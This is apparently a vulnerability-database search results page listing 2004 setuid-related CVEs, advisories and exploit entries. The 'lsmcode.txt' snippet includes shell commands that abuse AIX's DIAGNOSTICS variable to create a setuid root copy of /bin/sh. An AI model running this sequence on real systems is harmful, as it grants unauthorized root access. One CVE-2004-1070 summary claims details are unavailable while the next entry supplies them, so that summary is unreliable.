
3209 matches found

NVD
added 2004/12/31 5:0 a.m. | 8 views

CVE-2004-2303

MTools Mformat before 3.9.9, when installed setuid root, creates files with world-readable and world-writable permissions, which allows local users to read and overwrite files...

3.6 CVSS | 6.2 AI score | 0.00578 EPSS
Exploits: 0 | References: 3
NVD
added 2004/12/31 5:0 a.m. | 12 views

CVE-2004-2372

Buffer overflow in Bochs before 2.1.1, if installed setuid, allows local users to execute arbitrary code via a long HOME environment variable, which is used if the .bochsrc, bochsrc, and bochsrc.txt cannot be found in a known path. NOTE: some external documents recommend that Bochs be installed...

7.2 CVSS | 7.4 AI score | 0.00123 EPSS
Exploits: 1 | References: 4
OSV
added 2004/12/31 5:0 a.m. | 1 views

DEBIAN-CVE-2004-1453

GNU glibc 2.3.4 before 2.3.4.20040619, 2.3.3 before 2.3.3.20040420, and 2.3.2 before 2.3.2-r10 does not restrict the use of LD_DEBUG for a setuid program, which allows local users to gain sensitive information, such as the list of symbols used by the program...

2.1 CVSS | 6.7 AI score | 0.00078 EPSS
Exploits: 0 | References: 1
Packet Storm
added 2004/12/30 12:0 a.m. | 43 views

lsmcode.txt

mkdirhier /tmp/aap/bin export DIAGNOSTICS=/tmp/aap cat /tmp/aap/bin/Dctrl EOF !/bin/sh cp /bin/sh /tmp/.shh chown root:system /tmp/.shh chmod u+s /tmp/.shh EOF chmod a+x /tmp/aap/bin/Dctrl lsmcode /tmp/.shh...

7.4 AI score
Exploits: 0
NVD
added 2004/12/23 5:0 a.m. | 18 views

CVE-2004-0564

Roaring Penguin pppoe rp-ppoe, if installed or configured to run setuid root contrary to its design, allows local users to overwrite arbitrary files. NOTE: the developer has publicly disputed the claim that this is a vulnerability because pppoe "is NOT designed to run setuid-root." Therefore this...

2.1 CVSS | 6.3 AI score | 0.00072 EPSS
Exploits: 0 | References: 6
UbuntuCve
added 2004/12/23 5:0 a.m. | 22 views

CVE-2004-0564

Roaring Penguin pppoe rp-ppoe, if installed or configured to run setuid root contrary to its design, allows local users to overwrite arbitrary files. NOTE: the developer has publicly disputed the claim that this is a vulnerability because pppoe "is NOT designed to run setuid-root." Therefore this...

2.1 CVSS | 5.8 AI score | 0.00072 EPSS
Exploits: 0 | References: 1
OSV
added 2004/12/23 5:0 a.m. | 1 views

DEBIAN-CVE-2004-0564

Roaring Penguin pppoe rp-ppoe, if installed or configured to run setuid root contrary to its design, allows local users to overwrite arbitrary files. NOTE: the developer has publicly disputed the claim that this is a vulnerability because pppoe "is NOT designed to run setuid-root." Therefore this...

2.1 CVSS | 7 AI score | 0.00072 EPSS
Exploits: 0 | References: 1
OSV
added 2004/12/23 5:0 a.m. | 8 views

CVE-2004-0564

Roaring Penguin pppoe rp-ppoe, if installed or configured to run setuid root contrary to its design, allows local users to overwrite arbitrary files. NOTE: the developer has publicly disputed the claim that this is a vulnerability because pppoe "is NOT designed to run setuid-root." Therefore this...

6.2 AI score
Exploits: 0 | References: 8
Cvelist
added 2004/12/22 5:0 a.m. | 14 views

CVE-2004-1263

changepassword.cgi in ChangePassword 0.8, when installed setuid, allows local users to execute arbitrary code by modifying the PATH environment variable to point to a malicious "make" program...

7.2 AI score | 0.00067 EPSS
Exploits: 0 | References: 2
securityvulns
added 2004/12/21 12:0 a.m. | 163 views

AIX 5.1/5.2/5.3 local root exploits

hi, i found some local security holes in IBM's AIX versions 5.1, 5.2 and 5.3 unix for IBM RS/6000 powerpc. 1 the first is a bug in all setuid diag related tools that use an environment variable as a prefix to an external binary executed as root. 2 the second is a classical stack overflow in a too...

0.4 AI score
Exploits: 0
Ubuntu
added 2004/12/17 2:8 a.m. | 52 views

USN-39-1: Linux amd64 kernel vulnerability

USN-30-1 fixed several flaws in the Linux ELF binary loader's handling of setuid binaries. Unfortunately it was found that these patches were not sufficient to prevent all possible attacks on 64-bit platforms, so previous amd64 kernel images were still vulnerable to root privilege escalation if...

2.1 CVSS | 5.2 AI score | 0.00336 EPSS
Exploits: 1 | References: 1
CVE
added 2004/12/01 5:0 a.m. | 86 views

CVE-2004-1070

Technical details (affected kernel versions, vulnerable component, impact, or remediation) are not publicly available in the provided documents. Monitor for updates.

7.2 CVSS | 7.3 AI score | 0.00065 EPSS
Exploits: 0 | References: 19 | Affected Software: 8
Cvelist
added 2004/12/01 5:0 a.m. | 19 views

CVE-2004-1070

The load_elf_binary function in the binfmt_elf loader (binfmt_elf.c) in Linux kernel 2.4.x up to 2.4.27, and 2.6.x up to 2.6.8, does not properly check return values from calls to the kernel_read function, which may allow local users to modify sensitive memory in a setuid program and execute arbitrary...

7.3 AI score | 0.00065 EPSS
Exploits: 0 | References: 19
exploitpack
added 2004/11/25 12:0 a.m. | 17 views

atari800 - Local Privilege Escalation

atari800 - Local Privilege Escalation / Exploit for atari800 by pi3 pi3ki31ny pi3@pi3:$ ./p ...::: -= exploit for Atari800 by pi3 pi3ki31ny =- :::... Ussage: + ./p options -? -v choose a bug: 1 - first bug in all versions Atari800 2 - second bug in older Atari800 - modiy argv0 3 - third bug in...

1 AI score
Exploits: 0
0day.today
added 2004/11/25 12:0 a.m. | 24 views

atari800 Local Root Exploit

Exploit for linux platform in category local exploits =========================== atari800 Local Root Exploit =========================== / Exploit for atari800 by pi3 pi3ki31ny email protected:$ ./p ...::: -= exploit for Atari800 by pi3 pi3ki31ny =- :::... Ussage: + ./p options -? -v choose a bu...

6.8 AI score
Exploits: 0
Exploit DB
added 2004/11/25 12:0 a.m. | 42 views

atari800 - Local Privilege Escalation

/ Exploit for atari800 by pi3 pi3ki31ny pi3@pi3:$ ./p ...::: -= exploit for Atari800 by pi3 pi3ki31ny =- :::... Ussage: + ./p options -? -v choose a bug: 1 - first bug in all versions Atari800 2 - second bug in older Atari800 - modiy argv0 3 - third bug in config file - OS/AROM 4 - fourth bug in...

7.4 AI score
Exploits: 0
seebug.org
added 2004/11/25 12:0 a.m. | 18 views

atari800 Local Root Exploit

No description provided by source. / Exploit for atari800 by pi3 pi3ki31ny pi3@pi3:$ ./p ...::: -= exploit for Atari800 by pi3 pi3ki31ny =- :::... Ussage: + ./p options -? this help screen -v choose a bug: 1 - first bug in all versions Atari800 2 - second bug in older Atari800 - modiy argv0 3 -...

7.1 AI score
Exploits: 0
FreeBSD
added 2004/11/24 12:0 a.m. | 29 views

helvis -- arbitrary file deletion problem

The setuid root elvprsv utility, used to preserve recovery helvis files, can be abused by local users to delete with root privileges. The problem is that elvprsv deletes files when it thinks they have become corrupt. When elvprsv is pointed to a normal file then it will almost always think the fi...

2.1 CVSS | 6.2 AI score | 0.00055 EPSS
Exploits: 1 | References: 1
FreeBSD
added 2004/11/24 12:0 a.m. | 16 views

helvis -- information leak vulnerabilities

Once a recovery file has been preserved by the setuid root elvprsv utility it is placed in a world-readable directory with world-readable permissions. This possibly allows sensitive information to leak. In addition to this information leak, it is possible for users to recover files that belong to...

6.2 AI score
Exploits: 0 | References: 1
Ubuntu
added 2004/11/19 8:12 a.m. | 73 views

USN-30-1: Linux kernel vulnerabilities

CAN-2004-0883, CAN-2004-0949: During an audit of the smb file system implementation within Linux, several vulnerabilities were discovered ranging from out of bounds read accesses to kernel level buffer overflows. To exploit any of these vulnerabilities, an attacker needs control over the answers ...

6.4 CVSS | 6.8 AI score | 0.15369 EPSS
Exploits: 0 | References: 1